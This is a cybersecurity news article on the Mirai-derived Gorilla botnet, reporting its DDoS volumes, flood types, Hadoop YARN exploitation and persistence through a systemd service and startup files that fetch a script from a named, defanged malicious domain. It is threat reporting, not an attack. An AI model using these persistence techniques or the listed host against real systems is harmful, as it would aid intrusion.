Cyber security news for all

More

    New Gorilla Botnet Unleashes Over 300,000 DDoS Attacks Spanning 100 Countries

    A newly identified malware family, dubbed Gorilla (or GorillaBot), has emerged as a significant threat in the cybersecurity landscape. This botnet, a variant derived from the infamous leaked Mirai source code, has recently been uncovered by researchers.

    NSFOCUS, a cybersecurity firm responsible for detecting this malicious activity last month, disclosed that the botnet had issued an alarming 300,000+ attack commands from September 4 to September 27, 2024, with an unprecedented frequency of assaults. On average, at least 20,000 distributed denial-of-service (DDoS) commands were deployed daily.

    The attacks have wreaked havoc across more than 100 nations, targeting a wide range of sectors, including universities, government portals, telecommunications, financial institutions, and online gaming and gambling platforms. Notably, China, the U.S., Canada, and Germany emerged as the primary victims of these aggressive cyber offensives.

    According to NSFOCUS, Gorilla employs a variety of sophisticated DDoS techniques, such as UDP flood, ACK BYPASS flood, Valve Source Engine (VSE) flood, SYN flood, and ACK flood. The botnet exploits the connectionless UDP protocol, enabling it to spoof source IP addresses, thereby generating overwhelming volumes of traffic that are difficult to mitigate.

    Moreover, Gorilla is compatible with various CPU architectures, including ARM, MIPS, x86_64, and x86, enhancing its adaptability. The botnet connects to one of its five predefined command-and-control (C2) servers to receive instructions and execute further DDoS attacks.

    In a notable escalation, the malware includes features allowing it to exploit a vulnerability in Apache Hadoop YARN RPC, facilitating remote code execution. This flaw has been actively abused since at least 2021, according to reports from Alibaba Cloud and Trend Micro.

    Once entrenched within a system, the botnet ensures its persistence by installing a service file named custom.service within the “/etc/systemd/system/” directory. This service is configured to launch automatically with each system startup, effectively embedding the malware. Additionally, the service downloads and executes a shell script (“lol.sh”) from a remote server (“pen.gorillafirewall[.]su”). Similar commands are implanted in other files like “/etc/inittab,” “/etc/profile,” and “/boot/bootcmd,” ensuring that the script is executed whenever the system reboots or the user logs in.

    NSFOCUS emphasized that Gorilla employs encryption algorithms commonly associated with the Keksec group to obscure vital information, all while utilizing advanced counter-detection measures to sustain its long-term control over compromised IoT devices and cloud infrastructure. This makes it a formidable new player in the botnet landscape, with a marked ability to evade detection and execute large-scale DDoS campaigns.

    Recent Articles

    Related Stories